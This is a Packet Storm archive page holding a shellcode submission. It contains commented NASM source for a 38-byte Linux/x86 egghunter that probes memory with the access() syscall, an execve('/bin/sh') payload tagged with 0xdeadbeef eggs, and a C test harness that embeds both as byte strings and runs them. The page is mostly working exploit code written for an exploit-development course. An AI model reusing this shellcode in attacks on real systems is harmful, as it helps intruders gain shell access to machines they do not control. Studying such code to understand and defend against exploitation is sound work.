what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x86 Egghunter + access() Shellcode

Linux/x86 Egghunter + access() Shellcode
Posted May 31, 2018
Authored by Paolo Perego

38 bytes small Linux/x86 egghunter + access() shellcode.

tags | x86, shellcode
systems | linux
SHA-256 | 5bb54f21df2196370591c274991a596c8ac61ef9d2b7d4bb707eccadef695a0a

Linux/x86 Egghunter + access() Shellcode

Change Mirror Download
/*
; Filename: egghunter.nasm
; Author: Paolo Perego <paolo@codiceinsicuro.it>
; Website: https://codiceinsicuro.it
; Blog post: https://codiceinsicuro.it/slae/
; Twitter: @thesp0nge
; SLAE-ID: 1217
; Purpose: This is the first stage of our payload. An egg-hunter shellcode
; looping through memory and jumping on the payload after the
; second egg found in memory.

global _start

section .text

_start:

xor ecx, ecx
mul ecx

next_page:
or dx, 0xfff

next_addr:
; EDX is 4096 here, that is the value of PAGE_SIZE constant
inc edx

; EBX is our memory cursor
lea ebx, [edx+0x4]

xor eax, eax

; access is defined as #define __NR_acces 33 in
; /usr/include/i386-linux-gnu/asm/unistd_32.h:
;
; system call prototype is:
; int access(const char *pathname, int mode);

mov al, 0x21
int 0x80

cmp al, 0xf2 ; 0xf2 is the opcode for EFAULT. If my register
; has this value, a signal for a invalid page
; access it has been received
jz next_page

mov eax, key
mov edi, edx
scasd

jnz next_addr

scasd
jnz next_addr

; At this point we are at the very beginning of our shellcode, after
; the second key. We can jump to it
jmp edi

section .data
key equ 0xdeadbeef


; Filename: execve.nasm
; Author: Paolo Perego <paolo@codiceinsicuro.it>
; Website: https://codiceinsicuro.it
; Blog post: https://codiceinsicuro.it/slae/
; Twitter: @thesp0nge
; SLAE-ID: 1217
; Purpose: This is the default payload for the egg hunter demo. It will
; execute "/bin/sh" using execve() system call.

global _start

dd 0xdeadbeef
dd 0xdeadbeef

section .text

_start:
xor eax, eax ; init EAX to 0
push eax ; pushing 0 to the stack to be used as NULL pointer
; execve is defined as #define __NR_execve 11 in
; /usr/include/i386-linux-gnu/asm/unistd_32.h:
;
; system call prototype is:
; int execve(const char *filename, char *const argv[], char *const
envp[]);

push 0x68732f2f ; pushing //bin/sh into the stack
push 0x6e69622f ; the init double / is for alignment purpose

mov ebx, esp ; pointer to *filename
push eax ; pushing in the stack a pointer to NULL
mov edx, esp ; I don't care about environment here
push eax
mov ecx, esp ; I don't even care about passing arguments to
; my /bin/sh

mov al, 0xb ; execve = 11
int 0x80

*/

#include<stdio.h>
#include<string.h>

unsigned char egg_hunter[] = \
"\x31\xc9\xf7\xe1\x66\x81\xca\xff\x0f\x42\x8d\x5a\x04\x31\xc0\xb0\x21\xcd\x80\x3c\xf2\x74\xed\xb8\xef\xbe\xad\xde\x89\xd7\xaf\x75\xe8\xaf\x75\xe5\xff\xe7";

unsigned char code[] = \
"\xef\xbe\xad\xde\xef\xbe\xad\xde\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x50\x89\xe1\xb0\x0b\xcd\x80";


int main(int argc, char **argv)
{
printf("Shellcode Length: %d\n", strlen(code));
printf("Egghunter Length: %d\n", strlen(egg_hunter));
int (*ret)() = (int(*)())egg_hunter;
ret();
}



--
$ cd /pub
$ more beer

I pirati della sicurezza applicativa: https://codiceinsicuro.it

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close